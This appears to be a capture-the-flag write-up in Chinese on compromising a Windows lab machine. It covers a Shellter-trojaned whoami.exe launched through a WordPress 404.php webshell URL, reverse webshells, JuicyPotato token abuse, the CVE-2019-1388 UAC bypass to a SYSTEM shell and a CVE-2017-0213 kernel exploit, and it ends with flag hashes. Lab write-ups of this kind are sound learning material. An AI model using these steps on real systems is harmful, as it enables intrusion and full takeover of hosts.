先把無害的whoami.exe複製到當前目錄下 然後用shellter把惡意代碼注入到裡面
把包好的程式丟過去就能RCE了
第一種提權方式
第一種Shell方法
用剛剛的webshell執行剛剛包好的whoami.exe
view-source:http://localhost/retro/wp-content/themes/twentynineteen/404.php?shell=start%20C:\meow\whoami.exe
第二種Shell方法
用windows的webshell
Windows Reverse Webshell
第三種Shell方法
用windows的webshell 但C:\Windows\Temp好像不能寫 所以路徑要改
Windows Reverse Webshell
拿到Shell以後 因為有SeImpersonatePrivilege身分令牌 所以能用JuicyPotato.exe來提權
第二種提權方式
- CVE-2019-1388
打開Chrome以後可以看到一個書籤 CVE-2019-1388
直接把連結丟到自己的瀏覽器可以看到是關於UAC的漏洞 再往深一點研究可以發現這串描述
https://www.zerodayinitiative.com/advisories/ZDI-19-975/
打開資源回收桶發現有一個hhupd的檔案 需要經過UAC認證
把它丟到桌面打開 然後點詳細內容裡面的Show information about the publisher's certificate
這邊會出現一個證書 點中間藍藍那條 他會問你要用哪個瀏覽器開 選IE
開好IE以後點右上角的齒輪 然後File>Save As 他會出現一個存在哪邊的框框
到C:\Windows\System32下 把存的檔案名字改成*.*就能看到cmd.exe 右鍵打開他就是system了
第三種提權方式
在PayloadsAllTheThings裡面的Privilege Escalation可以翻到有CVE-2017-0213的Local Privilege Escalation
Windows Kernel Exploits裡面剛好有能用的 把檔案傳過去執行就是System了
Proof
user.txt
3b99fbdc6d430bfb51c72c651a261927
root.txt
7958b569565d7bd88d10c6f22d1c4063
